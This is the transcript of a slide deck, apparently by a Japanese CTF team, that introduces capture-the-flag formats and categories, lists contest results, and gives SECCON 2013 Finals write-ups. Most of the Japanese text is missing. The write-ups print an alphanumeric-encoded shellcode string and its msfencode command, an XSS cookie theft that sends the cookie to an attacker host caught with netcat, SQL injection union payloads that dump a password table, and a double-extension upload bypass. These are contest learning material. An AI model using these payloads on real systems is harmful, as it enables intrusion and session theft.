CTF stole something outrageous. My time…

CTF stole something outrageous. My time. EpsilonDelta

Upload: hiromu-yakura

Post on 19-Jun-2015


TRANSCRIPT

  • 1. CTF EpsilonDelta
  • 2. CTF
  • 3. CTFCapture The Flag
  • 4. CTF
  • 5. CTF
  • 6. CTF Capture The Flag
  • 7. CTF
  • 8. 2CTF CTF2 Jeopardy Attack-Defense
  • 9. Jeopardy
  • 10. Jeopardy
  • 11. Jeopardy
  • 12. Jeopardy
  • 13. Attack-Defense
  • 14. Attack-Defense FLAG AFLAG BFLAG C
  • 15. Attack-Defense FLAG A FLAG BFLAG C
  • 16. Attack-Defense FLAG A FLAGFLAG BFLAG C
  • 17. Attack-Defense AFLAG FLAG FLAG BFLAG C
  • 18. Attack-Defense
  • 19. Attack-Defense SLA
  • 20. King of the HillAttack-Defense
  • 21. King of the Hill FLAGFLAGFLAG AFLAG FLAG B
  • 22. King of the Hill FLAGFLAGFLAG FLAGFLAG AFLAG B
  • 23. King of the Hill FLAG FLAGFLAG FLAGFLAG AFLAG B
  • 24. King of the Hill FLAG FLAG FLAG FLAG FLAG AB
  • 25. King of the Hill FLAG FLAG FLAG FLAG FLAGAB
  • 26. King of the Hill FLAG FLAG
  • 27. CTF
  • 28. Reversing FLAG Windows/Linux
  • 29. Pwning Exploit FLAG
  • 30. Web FLAG SQL Injection, XSS PHPJavascript
  • 31. Cryptography FLAG RSA
  • 32. Forensics FLAG
  • 33. Steganography FLAG
  • 34. Trivia FLAG Reconnaissance
  • 35. EpsilonDelta
  • 36. EpsilonDeltaCTF
  • 37. EpsilonDelta CTFTime1 32 1
  • 38. EpsilonDelta 201330 12 124~48...
  • 39. Skype
  • 40. 48
  • 41. 24
  • 42. LAC IDA Pro @IT
  • 43.
  • 44. CSAW CTF Qualification Round 2012 20129 CTF 636174
  • 45. DEFCON CTF Qualifier 2013 CTF DEFCON 41479
  • 46. CSAW CTF Qualification Round 2013 138339 1
  • 47. No cON Name CTF 2013 13 12
  • 48. No cON Name CTF 2013 201311
  • 49. No cON Name CTF 2013 King of the Hill 6
  • 50. Codegate CTF Preliminary 2014 1 28339 U-20Junior
  • 51. SECCON 2012
  • 52. SECCON 2012 : : 8
  • 53. SECCON 2013 9 +
  • 54. SECCON 2013 4 / 10
  • 55. SECCON 2013
  • 56. SECCON 2013 3/1-2 King of the Hill
  • 57. SECCON 2013 2
  • 58.
  • 59.
  • 60. 1 2
  • 61. Writeup
  • 62. SECCON 2013 Finals 2tenkaku Writeup
  • 63.
  • 64.
  • 65.
  • 66. SECCON CTF
  • 67. SECCON CTF CTFWriteup ...
  • 68. SECCON CTF CTFWriteup... CTF
  • 69. Writeup?
  • 70. Writeup? Write up
  • 71. Writeup? Write up
  • 72. Writeup? Write up
  • 73. Writeup? Write up
  • 74. Writeup? Write up
  • 75.
  • 76. 2 1: 13:00 20:002: 09:00 14:00
  • 77. 2 1: 13:00 20:00 2: 09:00 14:00King on the hill()
  • 78. 2 1: 13:00 20:002: 09:00 14:00King on the hill()6 63130
  • 79.
  • 80. 2tenkaku
  • 81. 2tenkaku ....
  • 82. 2tenkaku ....Babel
  • 83. 2tenkaku ....Babel 31...
  • 84. 2tenkaku
  • 85.
  • 86. 4 FLAGFLAGkeyword.txt
  • 87. 4 FLAG FLAGkeyword.txt
  • 88.
  • 89.
  • 90. ()filter
  • 91.
  • 92. CPU
  • 93. CPU
  • 94. CPU shell
  • 95. CPU shellshellcode
  • 96. CPU shellshellcode2tenkakushellcode
  • 97.
  • 98. fork setrlimitshellforkkeyword.txtshellcode
  • 99. fork shellforksetrlimit keyword.txtshellcodefilter
  • 100. stage0filter shellcodeexecvecatshellcode execve("cat", {"cat", "keyword.txt", NULL}, NULL)
  • 101. stage0
  • 102. stage1
  • 103. stage1filter isalnum(shellcode[i]) == trueshellcodeA-Za-z0-9
  • 104. Alpha numeric
  • 105. Alpha numeric
  • 106. Alpha numeric ()
  • 107. Alpha numeric ()
  • 108. Alpha numeric ()
  • 109. Alpha numeric () Metasploitshellcodemsfencode -e x86/alpha_mixed BufferRegister=EAX
  • 110. ...
  • 111. ...
  • 112. Metasploit
  • 113. Metasploit .......
  • 114. ....
  • 115.
  • 116. Metasploit
  • 117. encode
  • 118. shellcode
  • 119. shellcode13
  • 120. shellcode13 Metasploit
  • 121. shellcode13 Metasploit
  • 122. shellcode13 Metasploit list
  • 123.
  • 124. Ph0E00X5wz00PPPPPPPPaTZ12h0000X5000 0PZJRRRRRRRRah0D00X50x00PTX10ZX00h0 000X50000PZJPRDDYLLZPRQQQQQQQQaZX 5sO005A000PTX10RX5AAAA5zqqqPRX5AAAA 5qqqtPRX500AA5bhtqPRX500005acdiPRX50 0005GdibPRX501005XZUIPRX5500A5ZBToP RX500005HD0XPRX500005dkXDPRX5A0045 nRYZPRX500005SQDXPRX5000A5bbXnPRX5 00005jbbbPRX5AAA15qqqaPRX5A0AA5qhtqP RX50AAA5XqqqPT
  • 125.
  • 126. (0xYYisalnum(0xYY) == true) push 0xYYYYYYYY push (register) pop eax, ecx, edx() xor eax, 0xYYYYYYYY() xor [register], dh xor [register], esi inc (register) dec(register)
  • 127. eax, ecx, edx
  • 128. eax, ecx, edx push 0xYYYYYYYY; pop eax, ecx, edx3
  • 129. eax, ecx, edx push 0xYYYYYYYY; pop eax, ecx, edx 3alnum0xZZ
  • 130. eax, ecx, edx push 0xYYYYYYYY; pop eax, ecx, edx 3alnum0xZZ xor eax, 0xYYYYYYYY2 0 127
  • 131. eax, ecx, edx push 0xYYYYYYYY; pop eax, ecx, edx 3alnum0xZZ xor eax, 0xYYYYYYYY2 0 127xor [register], dh(dec edx0xffffffff) push eax; push esp; pop eax; xor [eax], dh; pop eax 0 1270xffxor128 255
  • 132.
  • 133. shellcodeshellcode
  • 134. shellcodeshellcodexor [eax], esi
  • 135. shellcodeshellcodexor [eax], esi eaxaddresi
  • 136. shellcodeshellcodexor [eax], esi eaxaddresi
  • 137. push
  • 138. push
  • 139. push ret(0xC3)xor [eax], esi
  • 140. shellcode4byte push push shellcoderet ret
  • 141. stage1
  • 142.
  • 143. 110
  • 144. 110 King on the hill
  • 145. SECCON 2013 Finals Korin writeup @tyage
  • 146. Korin http://korin.tower/
  • 147. Korin - 1 http://korin.tower/
  • 148. Korin - 1 You are not admin!!...
  • 149. Korin - 1 You are not admin!!...
  • 150. Korin - 1
  • 151. Korin - 1 JavaScript Cookie XSS
  • 152. Korin - 1 >@gmail.com
  • 153. Korin - 1 >@gmail.com http://192.168.5.8/[cookie] JavaScript PC192.168.5.8 PC
  • 154. Korin - 1 192.168.5.8
  • 155. Korin - 1 192.168.5.8 nc -l -p 80
  • 156. Korin - 1 192.168.5.8 nc -l -p 80 GET /CGISESSID=XXXXXXX... HTTP/1.1 Cookie
  • 157. Korin - 1 192.168.5.8 nc -l -p 80 GET /CGISESSID=XXXXXXX... HTTP/1.1 Cookie Cookie
  • 158. Korin - 1 You are admin level2! 1
  • 159. Korin - 2 Message
  • 160. Korin - 2 URL http://korin.tower/?action=view&id=111111111111111
  • 161. Korin - 2 id or 1
  • 162. Korin - 2 id or 1
  • 163. Korin - 2 id or 1 SQL Injection
  • 164. Korin - 2 or union select 1,1,1 --
  • 165. Korin - 2 DBMS
  • 166. Korin - 2 DBMS MySQL or union select @@version,1,1 - Error
  • 167. Korin - 2 DBMS MySQL or union select @@version,1,1 - Error Postgres SQL or union select version(),1,1 - Error
  • 168. Korin - 2 DBMS MySQL or union select @@version,1,1 - Error Postgres SQL or union select version(),1,1 - Error SQLite or union select sqlite_version(),1,1 -
  • 169. Korin - 2 SQLitesqlite_master SQL or union all select group_concat(sql),1,1 from sqlite_master --
  • 170. Korin - 2 SQLitesqlite_master SQL or union all select group_concat(sql),1,1 from sqlite_master -CREATE TABLE contact (id, name, mail, honbun), CREATE TABLE nextLVpassword (str), CREATE TABLE zdummy (dummy)
  • 171. Korin - 2 or union all select str,1,1 from nextLVpassword --
  • 172. Korin - 2 or union all select str,1,1 from nextLVpassword - kinoko!!
  • 173. Korin - 3 2
  • 174. Korin - 3 test.php
  • 175. Korin - 3 test.php filename does not contain .jpg jpg
  • 176. Korin - 3 test.php filename does not contain .jpg jpg jpg
  • 177. Korin - 3 test.php filename does not contain .jpg jpg jpg test.jpg.php
  • 178. Korin - 3 test.php filename does not contain .jpg jpg jpg test.jpg.php http://korin.tower/uploaded/test.jpg.php
  • 179. Korin - 3